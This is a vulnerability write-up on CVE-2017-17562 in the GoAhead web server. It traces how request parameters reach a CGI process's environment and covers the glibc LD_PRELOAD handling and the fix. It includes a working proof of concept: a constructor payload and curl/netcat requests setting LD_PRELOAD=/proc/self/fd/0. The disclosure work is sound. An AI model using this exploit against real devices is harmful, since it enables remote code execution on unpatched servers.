description |

### INTRODUCTION

This blog post details [CVE-2017-17562](https://nvd.nist.gov/vuln/detail/CVE-2017-17562), a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.

The vulnerability is a result of initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all users who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as `LD_PRELOAD` (commonly used to perform function hooking, see [preeny](https://github.com/zardus/preeny)).

For those unfamiliar with GoAhead, its [marketing page](https://embedthis.com/goahead/) says that it’s “the world’s most popular, tiny embedded web server” and is used by such companies as IBM, HP, Oracle, Boeing, D-Link, and Motorola. We did a search on Shodan, and found over 735,000 devices using it on the internet today.

Shodan search results

![](https://images.seebug.org/1513654932926)

ZoomEye search results

![](https://images.seebug.org/1513657791312-w331s)

The exploitation of this issue serves as an interesting case study, and could be applied to other types of software with the same insecure construct.

### VULNERABILITY ANALYSIS

This vulnerability has existed in all versions of GoAhead since at least 2.5.0 (we could not find earlier versions to test against). You can follow along by cloning and compiling the repository as follows:

Figure-2: Cloning and running the vulnerable GoAhead daemon

```
daniel@makemyday:~$ git clone https://github.com/embedthis/goahead.git
Cloning into 'goahead'...
remote: Counting objects: 20583, done.
remote: Total 20583 (delta 0), reused 0 (delta 0), pack-reused 20583
Receiving objects: 100% (20583/20583), 19.71 MiB | 4.76 MiB/s, done.
Resolving deltas: 100% (14843/14843), done.
daniel@makemyday:~$ cd goahead/
daniel@makemyday:~/goahead$ ls
configure      CONTRIBUTING.md  doc        installs    main.me   Makefile      paks      README.md  test
configure.bat  dist             farm.json  LICENSE.md  make.bat  package.json  projects  src
daniel@makemyday:~/goahead$ git checkout tags/v3.6.4 -q
daniel@makemyday:~/goahead$ make > /dev/null
daniel@makemyday:~/goahead$ cd test
daniel@makemyday:~/goahead/test$ gcc ./cgitest.c -o cgi-bin/cgitest
daniel@makemyday:~/goahead/test$ sudo ../build/linux-x64-default/bin/goahead
```

### CODE

The vulnerability resides in the `cgiHandler` function, which starts by allocating an array of pointers for the `envp` [argument](https://www.gnu.org/software/libc/manual/html_node/Program-Arguments.html) of the new process, followed by initialising it with the key-value pairs taken from HTTP request parameters. Finally, the `launchCgi` function is called, which `fork`s and `execve`s the CGI script.

Besides filtering `REMOTE_HOST` and `HTTP_AUTHORIZATION`, all other parameters are considered trusted and passed along unfiltered. This allows an attacker control over arbitrary environment variables for the new CGI process. This is quite dangerous, as you will see later in the exploitation section.

Figure-3: [goahead/src/cgi.c:cgiHandler](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L51)

```
...
PUBLIC bool cgiHandler(Webs *wp)
{
    Cgi *cgip;
    WebsKey *s;
    char cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME];
    char *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe;
    CgiPid pHandle;
    int n, envpsize, argpsize, cid;
    ...
    /*
        Add all CGI variables to the environment strings to be passed to the spawned CGI process.
        This includes a few we don't already have in the symbol table, plus all those that are in
        the vars symbol table. envp will point to a walloc'd array of pointers.
        Each pointer will point to a walloc'd string containing the keyword value pair in the form
        keyword=value. Since we don't know ahead of time how many environment strings there will be
        the for loop includes logic to grow the array size via wrealloc.
     */
    envpsize = 64;
    envp = walloc(envpsize * sizeof(char*));
    for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
        if (s->content.valid && s->content.type == string &&
            strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
            strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
            envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
            trace(5, "Env[%d] %s", n, envp[n-1]);
            if (n >= envpsize) {
                envpsize *= 2;
                envp = wrealloc(envp, envpsize * sizeof(char *));
            }
        }
    }
    *(envp+n) = NULL;

    /*
        Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin
        temp file (and name) should already exist.
     */
    if (wp->cgiStdin == NULL) {
        wp->cgiStdin = websGetCgiCommName();
    }
    stdIn = wp->cgiStdin;
    stdOut = websGetCgiCommName();
    if (wp->cgifd >= 0) {
        close(wp->cgifd);
        wp->cgifd = -1;
    }

    /*
        Now launch the process. If not successful, do the cleanup of resources. If successful,
        the cleanup will be done after the process completes.
     */
    if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) {
    ...
```

### PATCH

This issue was fixed by skipping special parameter names, and prefixing all others with a static string. This appears to remediate the issue even against parameters of the form `a=b%00LD_PRELOAD%3D` - but please let me know if you find otherwise, I’d love to hear about it!

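The filtering rule described above can be sketched as a small standalone C function. This is a minimal illustration under stated assumptions, not GoAhead's actual code: the function names `env_name_is_blocked` and `format_cgi_env` are hypothetical, and `CGI_` is only an assumed stand-in for the value of `ME_GOAHEAD_CGI_PREFIX`.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Assumed stand-in for ME_GOAHEAD_CGI_PREFIX; the real value may differ. */
#define CGI_PREFIX "CGI_"

/* Return 1 if a request parameter name must never reach the CGI environment. */
int env_name_is_blocked(const char *name)
{
    static const char *exact[] = {
        "REMOTE_HOST", "HTTP_AUTHORIZATION", "IFS", "CDPATH", "PATH"
    };
    size_t i;

    assert(name != NULL);
    for (i = 0; i < sizeof exact / sizeof exact[0]; i++) {
        if (strcmp(name, exact[i]) == 0)
            return 1;
    }
    /* Names starting with LD_ are interpreted by the dynamic linker. */
    return strncmp(name, "LD_", 3) == 0;
}

/* Write "<prefix><name>=<value>" into out.
   Returns 1 on success, 0 if the name is blocked or out is too small. */
int format_cgi_env(const char *name, const char *value, char *out, size_t outsz)
{
    int n;

    if (env_name_is_blocked(name))
        return 0;
    n = snprintf(out, outsz, "%s%s=%s", CGI_PREFIX, name, value);
    return n >= 0 && (size_t)n < outsz;
}
```

Under this sketch, a request parameter named `LD_PRELOAD` produces no environment entry at all, while a parameter `name=value` becomes `CGI_name=value`, a variable name the dynamic linker does not treat specially.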

Figure-4: [git diff f9ea55a 6f786c1 src/cgi.c](https://github.com/embedthis/goahead/commit/6f786c123196eb622625a920d54048629a7caa74#diff-7c9c60c790648b06210f57b9e2f53ca7)

```
diff --git a/src/cgi.c b/src/cgi.c
index 899ec97b..18d9b45b 100644
--- a/src/cgi.c
+++ b/src/cgi.c
@@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp)
     envpsize = 64;
     envp = walloc(envpsize * sizeof(char*));
     for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
-        if (s->content.valid && s->content.type == string &&
-            strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
-            strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
-            envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
+        if (s->content.valid && s->content.type == string) {
+            if (smatch(s->name.value.string, "REMOTE_HOST") ||
+                smatch(s->name.value.string, "HTTP_AUTHORIZATION") ||
+                smatch(s->name.value.string, "IFS") ||
+                smatch(s->name.value.string, "CDPATH") ||
+                smatch(s->name.value.string, "PATH") ||
+                sstarts(s->name.value.string, "LD_")) {
+                continue;
+            }
+            envp[n++] = sfmt("%s%s=%s", ME_GOAHEAD_CGI_PREFIX,
+                s->name.value.string, s->content.value.string);
             trace(5, "Env[%d] %s", n, envp[n-1]);
             if (n >= envpsize) {
                 envpsize *= 2;
```

### EXPLOITATION

Although the ability to inject arbitrary environment variables into a new process may seem relatively benign, there are cases where “special” environment variables can lead to alternative control flows for the dynamic linker.

### ELF DYNAMIC LINKER

Reading the ELF header of the `goahead` binary, we can see that it’s a 64-bit dynamically-linked executable. The program interpreter is specified in the `INTERP` program header and points to `/lib64/ld-linux-x86-64.so.2` (this is the dynamic linker).

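The `INTERP` lookup described above can also be done programmatically. The following is a minimal sketch, assuming a Linux system with `<elf.h>`, a 64-bit ELF file, and a host with the same byte order as the file; the function name `read_elf_interp` is hypothetical.

```c
#include <assert.h>
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Copy the PT_INTERP path of a 64-bit ELF file into out.
   Returns 0 on success, -1 if the file cannot be read, is not ELF64,
   or has no PT_INTERP entry (for example a statically linked binary). */
int read_elf_interp(const char *path, char *out, size_t outsz)
{
    Elf64_Ehdr eh;
    Elf64_Phdr ph;
    FILE *fp;
    size_t n;
    unsigned i;
    int rc = -1;

    assert(path != NULL && out != NULL && outsz > 0);
    fp = fopen(path, "rb");
    if (fp == NULL)
        return -1;

    if (fread(&eh, sizeof eh, 1, fp) == 1 &&
        memcmp(eh.e_ident, ELFMAG, SELFMAG) == 0 &&
        eh.e_ident[EI_CLASS] == ELFCLASS64) {
        /* Walk the program header table looking for PT_INTERP. */
        for (i = 0; i < eh.e_phnum; i++) {
            long off = (long)(eh.e_phoff + (Elf64_Off)i * eh.e_phentsize);
            if (fseek(fp, off, SEEK_SET) != 0 || fread(&ph, sizeof ph, 1, fp) != 1)
                break;
            if (ph.p_type != PT_INTERP)
                continue;
            /* The segment contents are the NUL-terminated interpreter path. */
            n = ph.p_filesz < outsz - 1 ? (size_t)ph.p_filesz : outsz - 1;
            if (fseek(fp, (long)ph.p_offset, SEEK_SET) == 0 &&
                fread(out, 1, n, fp) == n) {
                out[n] = '\0';
                rc = 0;
            }
            break;
        }
    }
    fclose(fp);
    return rc;
}
```

Calling `read_elf_interp("./goahead", buf, sizeof buf)` on a dynamically linked build should fill `buf` with the same interpreter path that `readelf` reports.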

Figure-5: Reading the ELF header

```
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0xf80
  Start of program headers:          64 (bytes into file)
  Start of section headers:          21904 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         34
  Section header string table index: 33

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000001f8 0x00000000000001f8  R E    0x8
  INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
...
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
```

The dynamic linker is the first code which runs in a dynamically linked executable, and is responsible for linking and loading shared objects and resolving symbols. To get a list of all the shared objects the `goahead` binary loads, we can set a special environment variable `LD_TRACE_LOADED_OBJECTS` to `1`, which prints the loaded libraries and then exits.

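As a complementary run-time view, a process can list the shared objects already mapped into its own address space by reading `/proc/self/maps`. Note that this is a different technique from `LD_TRACE_LOADED_OBJECTS`: it inspects the kernel's mapping table instead of asking the dynamic linker to print its load list. The sketch below assumes Linux, and the function name `count_mapped_shared_objects` is hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Print each distinct ".so" path mapped into this process to dest and
   return how many were found, or -1 if /proc/self/maps cannot be opened. */
int count_mapped_shared_objects(FILE *dest)
{
    char line[4096], last[4096] = "";
    FILE *fp;
    int count = 0;

    assert(dest != NULL);
    fp = fopen("/proc/self/maps", "r");
    if (fp == NULL)
        return -1;

    while (fgets(line, sizeof line, fp) != NULL) {
        /* The pathname column is the only field that can contain '/'. */
        char *path = strchr(line, '/');
        if (path == NULL || strstr(path, ".so") == NULL)
            continue;
        path[strcspn(path, "\n")] = '\0';
        /* Consecutive segments of the same file repeat the same path. */
        if (strcmp(path, last) != 0) {
            fprintf(dest, "%s\n", path);
            strcpy(last, path);
            count++;
        }
    }
    fclose(fp);
    return count;
}
```

For a dynamically linked program the printed paths should include the C library and the dynamic linker itself, matching the kind of list shown by `LD_TRACE_LOADED_OBJECTS`.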

Figure-6: ld.so LD_TRACE_LOADED_OBJECTS

```
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead
        linux-vdso.so.1 => (0x00007fff31bb4000)
        libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000)
        libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f571f806000)
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
```

We can also find this information statically (without running the dynamic linker), by grepping for `DT_NEEDED` entries defined in each of the ELF shared objects recursively:

Figure-7: Statically finding shared object dependencies

```
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [libgo.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [libpthread.so.0]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
```

Note: For the astute reader who noticed these binaries are missing `linux-vdso.so.1`, that’s correct! vDSO is a special shared library mapped into user-space processes by the kernel. See [man 7 vdso](http://man7.org/linux/man-pages/man7/vdso.7.html).

### SPECIAL ENVIRONMENT VARIABLES

So that’s good and all, but what does any of this have to do with injecting environment variables?
Well … we know the dynamic linker is the first code to execute for a new process - and if we read [man 8 ld.so](http://man7.org/linux/man-pages/man8/ld.so.8.html) we discover there are special environment variables which modify default behavior.

As I’m a fan of looking at the source, let us take a journey into what’s happening. The `dl_main` function is essentially the main entry point of the dynamic linker.

Figure-8: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l865)

```
static void
dl_main (const ElfW(Phdr) *phdr,
         ElfW(Word) phnum,
         ElfW(Addr) *user_entry,
         ElfW(auxv_t) *auxv)
{
  const ElfW(Phdr) *ph;
  enum mode mode;
  struct link_map *main_map;
  size_t file_size;
  char *file;
  bool has_interp = false;
  unsigned int i;
  ...
  /* Process the environment variable which control the behaviour. */
  process_envvars (&mode);
```

One of the first things this function does is call `process_envvars`.

Figure-9: [glibc/elf/rtld.c:process_envvars](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l2457)

```
static void
process_envvars (enum mode *modep)
{
  char **runp = _environ;
  char *envline;
  enum mode mode = normal;
  char *debug_output = NULL;

  /* This is the default place for profiling data file. */
  GLRO(dl_profile_output)
    = &"/var/tmp\0/var/profile"[__libc_enable_secure ? 9 : 0];

  while ((envline = _dl_next_ld_env_entry (&runp)) != NULL)
    {
      size_t len = 0;

      while (envline[len] != '\0' && envline[len] != '=')
        ++len;

      if (envline[len] != '=')
        /* This is a "LD_" variable at the end of the string without
           a '=' character. Ignore it since otherwise we will access
           invalid memory below. */
        continue;

      switch (len)
        {
        case 4:
          /* Warning level, verbose or not. */
          if (memcmp (envline, "WARN", 4) == 0)
            GLRO(dl_verbose) = envline[5] != '\0';
          break;

        case 5:
          /* Debugging of the dynamic linker?
           */
          if (memcmp (envline, "DEBUG", 5) == 0)
            {
              process_dl_debug (&envline[6]);
              break;
            }
          if (memcmp (envline, "AUDIT", 5) == 0)
            audit_list_string = &envline[6];
          break;

        case 7:
          /* Print information about versions. */
          if (memcmp (envline, "VERBOSE", 7) == 0)
            {
              version_info = envline[8] != '\0';
              break;
            }

          /* List of objects to be preloaded. */
          if (memcmp (envline, "PRELOAD", 7) == 0)
            {
              preloadlist = &envline[8];
              break;
            }
```

We see that the linker is parsing the `envp` array and exercising different code paths if special variable names are found. What is particularly interesting is `case 7`’s processing of `LD_PRELOAD`, where `preloadlist` is initialised.

Figure-10: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l1606)

```
...
  /* We have two ways to specify objects to preload: via environment
     variable and via the file /etc/ld.so.preload. The latter can also
     be used when security is enabled. */
  assert (*first_preload == NULL);
  struct link_map **preloads = NULL;
  unsigned int npreloads = 0;

  if (__glibc_unlikely (preloadlist != NULL))
    {
      HP_TIMING_NOW (start);
      npreloads += handle_ld_preload (preloadlist, main_map);
      HP_TIMING_NOW (stop);
      HP_TIMING_DIFF (diff, start, stop);
      HP_TIMING_ACCUM_NT (load_time, diff);
    }
...
```

Further down in `dl_main`, if `preloadlist` is not `NULL` then the `handle_ld_preload` function is called.

Figure-11: [glibc/elf/rtld.c:handle_ld_preload](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l829)

```
/* The list preloaded objects. */
static const char *preloadlist attribute_relro;
/* Nonzero if information about versions has to be printed. */
static int version_info attribute_relro;

/* The LD_PRELOAD environment variable gives list of libraries
   separated by white space or colons that are loaded before the
   executable's dependencies and prepended to the global scope list.
   (If the binary is running setuid all elements containing a '/' are
   ignored since it is insecure.) Return the number of preloads
   performed. */
unsigned int
handle_ld_preload (const char *preloadlist, struct link_map *main_map)
{
  unsigned int npreloads = 0;
  const char *p = preloadlist;
  char fname[SECURE_PATH_LIMIT];

  while (*p != '\0')
    {
      /* Split preload list at space/colon. */
      size_t len = strcspn (p, " :");
      if (len > 0 && len < sizeof (fname))
        {
          memcpy (fname, p, len);
          fname[len] = '\0';
        }
      else
        fname[0] = '\0';

      /* Skip over the substring and the following delimiter. */
      p += len;
      if (*p != '\0')
        ++p;

      if (dso_name_valid_for_suid (fname))
        npreloads += do_preload (fname, main_map, "LD_PRELOAD");
    }
  return npreloads;
}
...
```

The `handle_ld_preload` function will parse the `preloadlist` and treat its value as a list of shared objects to be loaded! Putting all this together: because `goahead` lets us inject arbitrary environment variables, we can abuse glibc's special handling of variables such as `LD_PRELOAD` to load arbitrary shared objects that aren’t even listed in the binary!

### ELF .SO

So, that’s cool and all - we can force arbitrary shared objects to be loaded. But how does this allow us to run code?

Enter the [`.init` and `.fini` sections](http://l4u-00.jinr.ru/usoft/WWW/www_debian.org/Documentation/elf/node3.html). If we mark a function with the [constructor attribute](https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html) then we can force that function to be called even before `main`.

Figure-12: PoC/payload.c

```
#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World!\n", 14);
}
```

Figure-13: Compiling payload.c as shared object.

```
daniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so
daniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null
Hello: World!
daniel@makemyday:~/goahead/PoC$
```

Sweet!

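The ordering guarantee behind the constructor attribute can also be observed without a separate shared object. The following is a minimal sketch, assuming GCC or Clang (the attribute is a compiler extension); the names `init_calls` and `constructor_call_count` are hypothetical and not part of the original PoC.

```c
#include <assert.h>
#include <stdio.h>

/* Incremented by the constructor; zero-initialised before any code runs. */
static int init_calls = 0;

/* Runs when the containing object is loaded, before main() gets control. */
__attribute__((constructor))
static void before_main(void)
{
    init_calls++;
}

/* Report how many times the constructor has fired so far. */
int constructor_call_count(void)
{
    assert(init_calls >= 0);
    return init_calls;
}
```

By the time any code in `main` calls `constructor_call_count()`, the counter should already be 1. The same holds when the function lives in a preloaded shared object, which is what makes `LD_PRELOAD` sufficient for code execution.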
What does this look like if we try this out against GoAhead on our test system?

Figure-14: Trying a simple PoC

```
daniel@makemyday:~/goahead/PoC$ ls -la ./payload.so
-rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so
daniel@makemyday:~/goahead/PoC$ echo -en "GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\r\n\r\n" | nc localhost 80 | head -10
HTTP/1.0 200 OK
Date: Wed Dec 13 02:38:56 2017
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
content-type: text/html
daniel@makemyday:~/goahead/PoC$
```

We can clearly see that our shared object's code was executed by the `cgitest` process via `LD_PRELOAD`.

### LINUX /PROC/SELF/FD/0

There is still one critical piece of the puzzle that we are missing. Even though we know it’s possible to load arbitrary shared objects from disk, and constructors will allow for code execution - how do we actually inject a malicious shared object into the remote server? After all, if we can’t do that then it’s really unlikely a legitimate shared object on disk will help us.

Fortunately, the `launchCgi` function will actually [dup2()](http://man7.org/linux/man-pages/man2/dup.2.html) the stdin file descriptor which points to a temporary file containing the request body of the `POST` request. This means that there will be a file on disk containing user-supplied data, which could be referenced with something like `LD_PRELOAD=/tmp/cgi-XXXXXX`.

Figure-15: [goahead/src/cgi.c:launchCgi](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L533)

```
/*
    Launch the CGI process and return a handle to it.
 */
static CgiPid launchCgi(char *cgiPath, char **argp, char **envp, char *stdIn, char *stdOut)
{
    int fdin, fdout, pid;

    trace(5, "cgi: run %s", cgiPath);
    if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) {
        error("Cannot open CGI stdin: ", cgiPath);
        return -1;
    }
    if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) {
        error("Cannot open CGI stdout: ", cgiPath);
        return -1;
    }

    pid = vfork();
    if (pid == 0) {
        /*
            Child
         */
        if (dup2(fdin, 0) < 0) {
            printf("content-type: text/html\n\nDup of stdin failed\n");
            _exit(1);
        } else if (dup2(fdout, 1) < 0) {
            printf("content-type: text/html\n\nDup of stdout failed\n");
            _exit(1);
        } else if (execve(cgiPath, argp, envp) == -1) {
            printf("content-type: text/html\n\nExecution of cgi process failed\n");
        }
        ...
}
```

Still, having to remotely guess the temporary filename containing our `POST` payload is kind of annoying (but not impossible). Fortunately, the Linux `procfs` filesystem has a nice symbolic link that we can use to reference the stdin descriptor, which points to our temporary file. This can be leveraged by pointing `LD_PRELOAD` to `/proc/self/fd/0`. This can also be accessed using `/dev/stdin`.

Figure-16: [linux/fs/proc/self.c](https://elixir.free-electrons.com/linux/latest/source/fs/proc/self.c)

```
static const char *proc_self_get_link(struct dentry *dentry,
                                      struct inode *inode,
                                      struct delayed_call *done)
{
    struct pid_namespace *ns = inode->i_sb->s_fs_info;
    pid_t tgid = task_tgid_nr_ns(current, ns);
    char *name;

    if (!tgid)
        return ERR_PTR(-ENOENT);
    /* 11 for max length of signed int in decimal + NULL term */
    name = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC);
    if (unlikely(!name))
        return dentry ?
            ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD);
    sprintf(name, "%d", tgid);
    set_delayed_call(done, kfree_link, name);
    return name;
}

static const struct inode_operations proc_self_inode_operations = {
    .get_link = proc_self_get_link,
};
```

If we put all this information together, we can reliably exploit the vulnerability by sending a `POST` request containing a malicious shared object which contains a `constructor` to be called when loaded. We also specify an HTTP parameter containing `?LD_PRELOAD=/proc/self/fd/0` which will point to the temporary file on disk containing the attacker’s payload. At this point it’s game over.

Figure-17: Exploiting via the command line

```
daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9931    0  2035  100  7896   2035   7896  0:00:01  0:00:01 --:--:--  9774
HTTP/1.1 200 OK
Date: Sun Dec 17 13:08:20 2017
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
Content-type: text/html
daniel@makemyday:~/goahead/PoC$
```

If you would like a ready-to-go exploit please check out our [advisory repo](https://github.com/elttam/advisories/tree/master/CVE-2017-17562) on GitHub.

### CONCLUSION

This vulnerability was an interesting case study in how to remotely exploit `LD_PRELOAD`, and was tested (and worked) against every version of the GoAhead web server we could test (2.5.0 and later, prior to 3.6.5). The construct itself may exist in other services, and it would be interesting to investigate. It may be possible to just use the exploit string and do this blind without actually auditing any code.

Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules.
It’s possible there are other interesting vulnerabilities - and for those interested I’d recommend starting with a grep for `websDefineHandler` entry points.

If you’re interested in learning more about linking and loading, there are great articles [here](https://www.cs.stevens.edu/~jschauma/810/elf.html) and [here](http://s.eresi-project.org/inc/articles/elf-rtld.txt) that we suggest you check out.

Thanks for reading! |